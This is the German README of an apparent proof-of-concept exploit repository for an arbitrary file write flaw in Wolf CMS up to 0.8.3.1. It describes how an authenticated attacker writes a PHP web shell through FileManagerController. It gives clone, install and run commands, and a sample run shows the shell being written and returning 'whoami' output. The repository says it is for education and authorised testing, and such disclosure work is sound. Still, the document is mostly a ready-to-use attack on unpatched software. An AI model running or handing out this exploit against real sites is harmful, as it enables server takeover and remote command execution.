
PoC-Exploit für Wolf CMS <= 0.8.3.1: authentifiziert sich beim Admin, schreibt über FileManagerController eine beliebige PHP-Datei nach /public und führt Befehle über eine Web-Shell aus.
Dieses Repository enthält einen Proof-of-Concept(PoC)-Exploit für CVE-2026-67206
Dieses Projekt dient ausschließlich Bildungszwecken und autorisierten Sicherheitstests. Verwenden Sie es nicht gegen Systeme, die Sie nicht besitzen oder für die Sie keine Testberechtigung haben.
Eine Schwachstelle für beliebiges Datei-Schreiben existiert in Wolf CMS bis einschließlich Version 0.8.3.1. Sie ermöglicht einem authentifizierten Angreifer, beliebige schädliche Dateien in das /public-Verzeichnis des Web-Roots über die Funktionen create_file() und save() der Datei FileManagerController.php zu schreiben. Die Funktion create_file() der Datei FileManagerController.php validiert Dateierweiterungen nicht, wodurch authentifizierte Angreifer schädliche PHP-Skripte schreiben und Remote-Code-Execution-Rechte erlangen können.
Eine ausführliche Analyse mit Quellcode-Analyse und Exploit-Demonstration finden Sie in meinem Medium-Blog.
Alle Versionen von Wolf CMS bis einschließlich 0.8.3.1 sind betroffen. Das Wolf-CMS-Repository wurde am 28. August 2021 archiviert und wird nicht mehr aktiv gepflegt. Derzeit existieren keine Patches für diese Schwachstelle.
git clone https://github.com/anirbala98/CVE-2026-67206.git
cd CVE-2026-67206/
pip install -r requirements.txt
python exploit.py <base_url> -u <username> -p <password>
python exploit.py http://127.0.0.1:8080/ -u admin -p admin
└─$ python exploit.py http://127.0.0.1:8080/ -u admin -p 12966cc814K
[*] Logging in with provided credentials...
[+] Login successful
[*] Creating a file named shell.php...
[+] File creation successful
[*] Attempting to write payload to shell.php...
[+] Payload written successfully!
[+] Web shell can be accessed with 'cmd' query string at http://127.0.0.1:8080/public/shell.php
[+] Testing output of http://127.0.0.1:8080/public/shell.php?cmd=whoami
www-data